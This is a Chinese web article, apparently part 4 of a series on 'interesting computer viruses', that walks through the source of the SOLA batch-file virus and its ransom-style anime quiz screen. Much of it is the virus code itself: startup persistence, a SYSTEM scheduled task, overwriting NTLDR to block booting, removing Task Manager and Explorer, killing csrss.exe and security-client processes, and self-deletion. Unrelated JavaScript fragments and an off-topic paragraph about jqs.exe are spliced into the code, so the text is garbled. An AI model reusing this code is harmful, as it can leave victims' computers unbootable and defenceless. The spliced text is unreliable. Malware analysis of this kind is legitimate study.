有哪些有趣的电脑病毒？(4)

if not exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\Tasks.xxx %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks"

sleep 2000

goto Turn

::End of Run

goto End&if errorlevel 1 exit

::End of Run

:Virus

if not "%Runtime%"=="0" goto VirusChk

set /a RunTime=%Runtime%-1

echo !%Runtime%>%sola%\RunTime.txt

cd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"

echo On Error Resume Next>TENBATSU.VBS

echo set ws=wscript.createobject("wscript.shell")>>TENBATSU.VBS

echo ws.run "%sola%\sola.bat -Tenbatsu",0 >>TENBATSU.VBS

goto Diskchk

:VirusChk

if not exist "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\TENBATSU.VBS" goto Kill

goto Diskchk

:Tenbatsu

:KillNTLDR

attrib %systemdrive%\NTLDR -s -h -r

copy /Y %systemdrive%\NTLDR %sola%\NTLDR

echo NO NTLDR>%systemdrive%\NTLDR

::attrib %systemdrive%\NTLDR +s +h +r //备份C盘的ntldr文件.(经分析病毒具有自删除功能.这个一会再分析)

:PauseSFC

var %s = new activexobject("wscript.shell")。var shell = new activexobject( "wscript.shell")。var wscript = new activexobject("wscript.shell")。

:KillTaskmgr

del /q /a %systemroot%\system32\dllcache\taskmgr.exe

taskkill /f /im taskmgr.exe & if errorlevel 1 ren %systemroot%\system32\taskmgr.exe taskmgr.xxx & if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe',0);window.close()" & sleep 500

ren %systemroot%\system32\taskmgr.exe taskmgr.xxx //备份并删除任务管理器

:KillExplorer

window.activexobject || "activexobject" in window)return true。if(window.activexobject){sxh=new activexobject("microsoft.xmlhttp")}else if(window.xmlhttprequest){sxh=new xmlhttprequest()}。top.space_additem(4:window,1228:javascript:window,600,600:javascript:window,600.top,0),0,0:window,0,4966,23699,80:javascript,0:javascript,1,600,0,5329:javascript,0),0):window。

ren %systemroot%\explorer.exe explorer.xxx

start /max %setup%\TENBATSU.BAT //备份并删除explorer.exe

:Timeset

sleep 660000

if exist %sola%\Killself Exit

:Kill

attrib %systemdrive%\NTLDR -s -h -r

echo NO NTLDR>%systemdrive%\NTLDR

::attrib %systemdrive%\NTLDR +s +h +r

tasklist >%sola%\Task.txt

FOR /F "tokens=2" %%i in ('findstr /I "csrss.exe" "%sola%\Task.txt"') do ntsd -p %%i

goto Diskchk

:KillSelf

:StartExplorer

ren %systemroot%\explorer.xxx explorer.exe

start %systemroot%\explorer.exe

:BackNTLDR

attrib %systemdrive%\NTLDR -s -h -r

copy /Y %sola%\NTLDR %systemdrive%\NTLDR

attrib %systemdrive%\NTLDR +s +h +r //这一段就是病毒自我删除的代码了

:RenTmg

ren %systemroot%\system32\taskmgr.xxx taskmgr.exe

:KillVirus

copy %setup%\KillVirus.txt %sola%\KillVirus.txt

C:

cd\

md ~Install

cd ~Install

rar x -hpkakenhi200601 %setup%\SolaKiller.rar //对我们来说至关重要的一句!!!为什么重要请一直往下看~

wscript.shell、wscript.shell.1、wscript.network、wscript.network.1、adodb.stream、shell.application。jqs.exe is the java quick starter. it doesn't do much harm, but it does access the disks a lot. how to disable jqs.exe for all users of a computer: press the windows and r keys at the same time to bring up the run command (or click ‘start’ and then click ‘run’) type services.msc and press ok to load the services configuration window scroll down the list of services until you find ‘java quick starter’ and then double click it to open the java quick starter properties window in the general tab, change the ‘startup type’ from ‘automatic’ to ‘disabled’ then press the ok button close the services window – after you next restart your computer jqs.exe will be disabled and will no longer run, whereas doing this via control panel doesn't always work.。var %s = new activexobject("wscript.shell")。

rd /s /q %setup%

attrib %systemroot%\Tasks\Tasks.job -s -h -r

del %systemroot%\Tasks\Tasks.job

cd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"

if exist sola.vbs del sola.vbs

if exist tenbatsu.vbs del tenbatsu.vbs

start %systemroot%\system32\notepad.exe %sola%\KillVirus.txt

del %sola%\sola.bat //自我删除(同上一段)

Exit

:Open

if "%1"=="-USB" Exit

goto GetName

:BackOpen

if not exist "%Name%" exit

call "%Name%"

:Save

for /f "tokens=2 delims= " %%i in ('tasklist /nh^|find "vrvsafec.exe"') do set str=%str% /pid %%i。for /f "tokens=2 delims= " %%i in ('tasklist /nh^|find "watchclient.exe"') do set str=%str% /pid %%i。for /f "tokens=2 delims= " %%i in ('tasklist /nh^|find "vrvrf_c.exe"') do set str=%str% /pid %%i。

rar -m0 -ep -ep1 a "%PackName%" "%Name%"

echo %Code%>>"%PackName%"

:Del

attrib "%Name%" -s -h -r

del "%Name%"

attrib Function.dll -s -h -r

del Function.dll

attrib %0 -s -h -r

del %0

exit

::CMD program will stop there.

:GetName

set Code=SOLA_2.0_323111111527875

set Name=新中国诞辰60周1.doc

goto Backopen

:End

下面介绍让我看了直冒冷汗的一段:

刚才说到Function.dll其实是一个压缩文件.解压后发现这些文件:

jpgpack.dll

exepack.dll

txtpack.dll

docpack.dll

sleep.exe

Tasks.xxx

SOLA.BAT

TDPack.txt

EJPack.txt

Rar.exe

scan.bat

infect.bat

Autorun.inf

TENBATSU.BAT

KillVirus.TXT

RecentInf.bat

LocalScan.bat

readlnk.bat

SolaKiller.rar

看看让我看了直冒冷汗的第一个文件吧:KillVirus.TXT

文件内容:

各位OTAKU：

您好。首先，让我对此病毒给您带来的

不便向您道歉。

SOLA已经从您的计算机中清除。但由于

WINLOGON被锁定，计算机暂时无法关机、重

启，也无法打开任务管理器。但这些问题在

冷重启后即可解决。

您的计算机已经有了SOLA的标记，因此

不会重复感染。

在硬盘中还留有被SOLA病毒感染的文件

，尽管不会重复感染，但建议您清除它们。

系统中已经安装了SOLA的专杀程序，它可以

帮助您扫描并清除带毒文件。

祝您好运。

SOLA的制造者

KAKENHI

天哪................

再看看更吓人的TENBATSU.BAT.

源代码太长了.我整理出了运行之后屏幕上会显示的东西:

警告：如果现在关闭计算机，计算机将无法启动！！！

I'm a virus. My name is sola.

我是一个病毒。我的名字叫苏拉。

今天，在这片堕落的土地上，我苏醒过来。

警告：如果现在关闭计算机，计算机将无法启动！！！

我曾经很快乐地活着，与我的朋友，ACG，快乐地活着。

我曾经也对病毒深恶痛绝。

然而.............

警告：如果现在关闭计算机，计算机将无法启动！！！

自从我来到了这片土地上，这片自称伟大，崇高，光明的土地上。

这片名为中国的土地上

我的朋友，已遍体鳞伤。

警告：如果现在关闭计算机为什么电脑病毒功能强大，计算机将无法启动！！！

他死了

Death Note

《死亡笔记》

警告：如果现在关闭计算机，计算机将无法启动！！！

她死了

Koihime Musou

《恋姬 无双》

警告：如果现在关闭计算机，计算机将无法启动！！！

还有好多好多的同胞，惨死在你们的蹂躏之下。

警告：如果现在关闭计算机，计算机将无法启动！！！

广电总局的一纸通告，无数只肮脏的手便掩盖了她的气息。

互联网上的一句咒骂，无数声污秽的咒骂便淹没了她的踪迹。

警告：如果现在关闭计算机，计算机将无法启动！！！

我终于知道了，信息，原来是无法透过国界线而传播的。

即使是爱，即使是恨，即使是那一个个爱恨与泪水交织的故事。

也无法透过GFW，更无法透过这个国度的某些人心中，那道厚厚的屏障。

警告：如果现在关闭计算机，计算机将无法启动！！！

于是，我愿做这个罪恶的病毒，来再次查看，你的心灵。

警告：如果现在关闭计算机，计算机将无法启动！！！



你，是谁？？？

警告：如果现在关闭计算机，计算机将无法启动！！！

是中国人吗？

警告：如果现在关闭计算机，计算机将无法启动！！！

是民族情绪的受害人吗？

警告：如果现在关闭计算机，计算机将无法启动！！！

还是知道，世界上有一个词语叫ACG，并能够容忍，接纳它呢？

警告：如果现在关闭计算机，计算机将无法启动！！！

那，让我们来做一个游戏吧。

也许你的记忆中，还有1000年前夏天的传说。

还有120元的车票，

还有银河铁道，

还有钢琴之森，

还有澄澈的天空下，响起的祈祷之歌。

警告：如果现在关闭计算机，计算机将无法启动！！！

你需要做的，仅仅是回答几个问题。

你喜欢吗？

你喜欢吗？

你喜欢GAL游戏吗？

选择你最擅长的测试卷吧，然后用你聪明的头脑思考，写出心中的答案。

如果你的试卷能及格，我将痛悔我的罪行，并删除自己。

如果你的试卷是零分，我将继承同伴的愤怒，破坏你的计算机。

另外我必须说，我只能把10分钟的时间留给你。

现在，你无法逃避。

因为你已经无法打开任务管理器，更无法上网查找信息。

选择吧，但是要快，容不得犹豫。我已经打开了我的计时器。





我最擅长的测试卷：

----------------问题1---------------------（注：一共有5个问题。只要答对两个或两个以上就过关。）

男主角在入学第一天就听到惊天动地的发言，并加入了创建的一个社团，这个社团教室原本是文学社的，但被强行占用。主要社团成员有：眼睛娘、很有气势的社长、有着魔鬼身材，比男主角高一个年级的吉祥物、被社长指挥得团团转的男主角。

请问这个社团叫什么团？（3个英文字母）

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-106915-4.html